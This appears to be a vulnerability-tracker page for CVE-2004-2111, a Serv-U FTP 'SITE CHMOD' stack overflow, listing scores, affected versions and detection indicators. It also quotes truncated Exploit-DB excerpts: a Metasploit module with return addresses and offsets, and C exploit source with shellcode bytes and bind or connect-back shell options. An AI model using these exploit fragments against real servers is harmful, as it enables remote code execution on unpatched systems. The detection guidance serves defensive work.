CVE-2004-2111
published 2004-12-31CVE-2004-2111: Stack-based buffer overflow in the site chmod command in Serv-U FTP Server before 4.2 allows remote attackers to execute arbitrary code via a long filename.
PriorityP260high8.5CVSS 2.0
AVNACMAuSCCICAC
EXPLOIT
EPSS
86.87%
99.7th percentile
Stack-based buffer overflow in the site chmod command in Serv-U FTP Server before 4.2 allows remote attackers to execute arbitrary code via a long filename.
Affected
8 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| solarwinds | serv-u_file_server | <= 4.1.0.3 | — |
| solarwinds | serv-u_file_server | — | — |
| solarwinds | serv-u_file_server | — | — |
| solarwinds | serv-u_file_server | — | — |
| solarwinds | serv-u_file_server | — | — |
| solarwinds | serv-u_file_server | — | — |
| solarwinds | serv-u_file_server | — | — |
| solarwinds | serv-u_file_server | — | — |
Detection & IOCsextracted from sources · hover to see the quote
bytes↗
\xeb\xc9\x41\x41
bytes↗
W00T
bytes↗
\x41\x41\xEB\x04
bytes↗
\xeb\x06\x90\x90\xd6\x19\x02\x75
bytes↗
\xeb\x06\xeb\x06
- →Detect oversized SITE CHMOD FTP commands: a SITE CHMOD command with a filename argument exceeding ~400 bytes is a strong indicator of exploitation attempts against CVE-2004-2111. ↗
- →Match FTP banner for vulnerable versions: Serv-U FTP Server v3.x or v4.0/v4.1 indicates a vulnerable target. ↗
- →Detect egghunter tag 'W00T' in FTP SITE CHMOD payloads as a Metasploit-specific exploit indicator. ↗
- →Flag FTP sessions where SITE CHMOD is followed by a payload containing SEH overwrite patterns (e.g., short JMP opcodes \xeb\x06 or \xeb\xc9 followed by return addresses) within the filename argument. ↗
- →Monitor for outbound connections to unexpected ports (e.g., 28876 or attacker-controlled ports) from the Serv-U FTP server process after a SITE CHMOD command, indicating successful shell binding. ↗
- →Exploitation requires valid FTP credentials and a writable directory; alert on authenticated FTP sessions issuing SITE CHMOD with abnormally long filenames (>400 bytes). ↗
- →Detect the exploit probe sequence: SITE CHMOD 477 with a filename containing \xff\xff bytes used to fingerprint the server version before the actual overflow. ↗
- ·Exploitation leaves the Serv-U FTP service in a non-functional (crashed) state after a successful attack, which can serve as a post-exploitation indicator. ↗
- ·The SEH overwrite offset differs between Serv-U versions: offset 0x193 for v3.0.0.20–v4.1.0.11 and 0x133 for v3.0.0.16–v3.0.0.19; detection rules should account for variable payload offsets (~394–400 bytes) across targets. ↗
- ·The Metasploit module bad characters list (\x00\x7e\x2b\x26\x3d\x25\x3a\x22\x0a\x0d\x20\x2f\x5c\x2e) defines bytes that will NOT appear in the exploit payload, which can inform byte-pattern exclusions in detection signatures. ↗
- ·The exploit targets Windows 2000 and Windows XP only; return addresses are DLL-specific (WS2HELP.DLL, libeay32.dll, ssleay32.dll) and vary by OS version and service pack. ↗
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-r5vj-79v6-4xr3: Stack-based buffer overflow in the site chmod command in Serv-U FTP Server before 4
ghsa_unreviewed·2022-04-29
CVE-2004-2111 [HIGH] CWE-119 GHSA-r5vj-79v6-4xr3: Stack-based buffer overflow in the site chmod command in Serv-U FTP Server before 4
Stack-based buffer overflow in the site chmod command in Serv-U FTP Server before 4.2 allows remote attackers to execute arbitrary code via a long filename.
GHSA
GHSA-23w8-jcvm-j4jg: Serv-U FTP Server 4
ghsa_unreviewed·2022-04-29·CVSS 8.5
CVE-2004-2533 [HIGH] CWE-20 GHSA-23w8-jcvm-j4jg: Serv-U FTP Server 4
Serv-U FTP Server 4.1 (possibly 4.0) allows remote attackers to cause a denial of service (application crash) via a SITE CHMOD command with a "\\...\" followed by a short string, causing partial memory corruption, a different vulnerability than CVE-2004-2111.
No detection rules found.
Exploit-DB
RhinoSoft Serv-U FTPd Server < 4.2 - Remote Buffer Overflow (Metasploit)
exploitdb·2011-12-02
CVE-2004-2111 RhinoSoft Serv-U FTPd Server < 4.2 - Remote Buffer Overflow (Metasploit)
RhinoSoft Serv-U FTPd Server 'Serv-U FTP Server %q{
This module exploits a stack buffer overflow in the site chmod command
in versions of Serv-U FTP Server prior to 4.2.
You must have valid credentials to trigger this vulnerability. Exploitation
also leaves the service in a non-functional state.
},
'Author' => 'thelightcosine ',
'License' => MSF_LICENSE,
'Version' => '$Revision$',
'References' =>
[
[ 'CVE', '2004-2111'],
[ 'BID', '9483'],
],
'Privileged' => true,
'DefaultOptions' =>
{
'EXITFUNC' => 'thread',
},
'Payload' =>
{
'BadChars' => "\x00\x7e\x2b\x26\x3d\x25\x3a\x22\x0a\x0d\x20\x2f\x5c\x2e",
'DisableNops' => true,
},
'Platform' => 'win',
'Targets' =>
[
[ 'Windows 2000 SP0-4 EN', {
'Ret' => 0x750212bc, #WS2HELP.DLL
'Offset' => 396 } ],
[ 'Windows XP SP0-1 EN', {
'Ret' => 0x71aa388f,
Exploit-DB
RhinoSoft Serv-U FTPd Server 4.x - 'site chmod' Remote Buffer Overflow
exploitdb·2004-01-30
CVE-2004-2111 RhinoSoft Serv-U FTPd Server 4.x - 'site chmod' Remote Buffer Overflow
RhinoSoft Serv-U FTPd Server 4.x - 'site chmod' Remote Buffer Overflow
---
#include
#include
#include
#include
#define exploit_length 511
#define NOP 'A'
#define SEH_handler_offset 400
char* SEH_handler = "\x41\x41\xEB\x04"; // 3) jmp over next four bytes
char* retaddress_4004 = "\xab\x1c\x5f\x01"; // 1) libeay32.015f1cab
char* retaddress_4100 = "\xcb\x1c\x41\x01"; // 1) ssleay32.01411ccb
char* retaddress_4103 = "\x8b\x1d\x41\x01"; // 1) ssleay32.01411d8b
char* shellcode =
"\xeb\x43\x56\x57\x8b\x45\x3c\x8b\x54\x05\x78\x01\xea\x52\x8b\x52"
"\x20\x01\xea\x31\xc0\x31\xc9\x41\x8b\x34\x8a\x01\xee\x31\xff\xc1"
"\xcf\x13\xac\x01\xc7\x85\xc0\x75\xf6\x39\xdf\x75\xea\x5a\x8b\x5a"
"\x24\x01\xeb\x66\x8b\x0c\x4b\x8b\x5a\x1c\x01\xeb\x8b\x04\x8b\x01"
"\xe8\x5f\x5e\xff\xe0\xfc\x31\xc0\x64\x8b\x40\x30
Exploit-DB
RhinoSoft Serv-U FTPd Server 3.x/4.x - 'SITE CHMOD' Remote Overflow
exploitdb·2004-01-27
CVE-2004-2111 RhinoSoft Serv-U FTPd Server 3.x/4.x - 'SITE CHMOD' Remote Overflow
RhinoSoft Serv-U FTPd Server 3.x/4.x - 'SITE CHMOD' Remote Overflow
---
/*
*
* Servu.c - Serv-U FTPD 3.x/4.x "SITE CHMOD" Command
* Remote stack buffer overflow exploit
*
* Copyright (C) 2004 HUC All Rights Reserved.
*
* Author : lion
* : [email protected]
* : http://www.cnhonker.com
* Date : 2004-01-25
* : 2004-01-25 v1.0 Can attack Serv-U v3.0.0.20~v4.1.0.11
* Tested : Windows 2000 Server EN/GB
* : + Serv-U v3.0.0.20~v4.1.0.11
* Notice : *** Bug find by kkqq [email protected] ***
* : *** You need a valid account and a writable directory. ***
* Complie : cl Servu.c
* Usage : Servu [-u user] [-p pass] [-d dir] [-f ftpport] [-c cbhost] [-s shellport]
*/
#include
#include
#include
#include
#pragma comment(lib, "ws2_32")
// for bind shellcode
#define BIND_OFFSET 91
// for connectback shell
Exploit-DB
RhinoSoft Serv-U FTPd Server 3/4 - MDTM Command Stack Overflow (2)
exploitdb·2004-01-25
CVE-2004-2111 RhinoSoft Serv-U FTPd Server 3/4 - MDTM Command Stack Overflow (2)
RhinoSoft Serv-U FTPd Server 3/4 - MDTM Command Stack Overflow (2)
---
// source: https://www.securityfocus.com/bid/9483/info
RhinoSoft Serv-U FTP Server is reportedly prone to a buffer overflow. The issue exists when a 'site chmod' command is issued on a non-existant file. If an excessively long filename is specified for the command, an internal buffer will be overrun, resulting in a failure of the FTP server. Execution of arbitrary code may be possible.
/*
* serv-u 4.2 site chmod long_file_name stack overflow exp
* vul discovered by [email protected]
* exp coded by [email protected]
* Jan 25 2004
*/
/* test with serv-U 4.1.0.7, 4.1.0.11 on win2k sp4 en machine*/
#include
#include
#define CHMOD_CMD "SITE CHMOD 0666 "
#define ERR_HEADER "550 /"
#define SEH_STACK_POSITION 0x54
#define
Exploit-DB
RhinoSoft Serv-U FTPd Server 3/4 - MDTM Command Stack Overflow (1)
exploitdb·2004-01-24
CVE-2004-2111 RhinoSoft Serv-U FTPd Server 3/4 - MDTM Command Stack Overflow (1)
RhinoSoft Serv-U FTPd Server 3/4 - MDTM Command Stack Overflow (1)
---
// source: https://www.securityfocus.com/bid/9483/info
RhinoSoft Serv-U FTP Server is reportedly prone to a buffer overflow. The issue exists when a 'site chmod' command is issued on a non-existant file. If an excessively long filename is specified for the command, an internal buffer will be overrun, resulting in a failure of the FTP server. Execution of arbitrary code may be possible.
/*
software: Serv-U 4.1.0.0
vendor: RhinoSoft, http://www.serv-u.com/
credits: kkqq , http://www.0x557.org/release/servu.txt
greets: rosecurity team, int3liban
notes: should work on any NT, reverse bindshell, terminates the process
author: mandragore, [email protected]
*/
#include
#include
#include
#include
#includ
Metasploit
Serv-U FTP Server Buffer Overflow
metasploit
Serv-U FTP Server Buffer Overflow
Serv-U FTP Server Buffer Overflow
This module exploits a stack buffer overflow in the site chmod command in versions of Serv-U FTP Server prior to 4.2. You must have valid credentials to trigger this vulnerability. Exploitation also leaves the service in a non-functional state.
No writeups or analysis indexed.
http://archives.neohapsis.com/archives/bugtraq/2004-01/0249.htmlhttp://marc.info/?l=bugtraq&m=107513654005840&w=2http://securitytracker.com/id?1008841http://www.securityfocus.com/bid/9483http://www.securityfocus.com/bid/9675https://exchange.xforce.ibmcloud.com/vulnerabilities/14931http://archives.neohapsis.com/archives/bugtraq/2004-01/0249.htmlhttp://marc.info/?l=bugtraq&m=107513654005840&w=2http://securitytracker.com/id?1008841http://www.securityfocus.com/bid/9483http://www.securityfocus.com/bid/9675https://exchange.xforce.ibmcloud.com/vulnerabilities/14931
2004-12-31
Published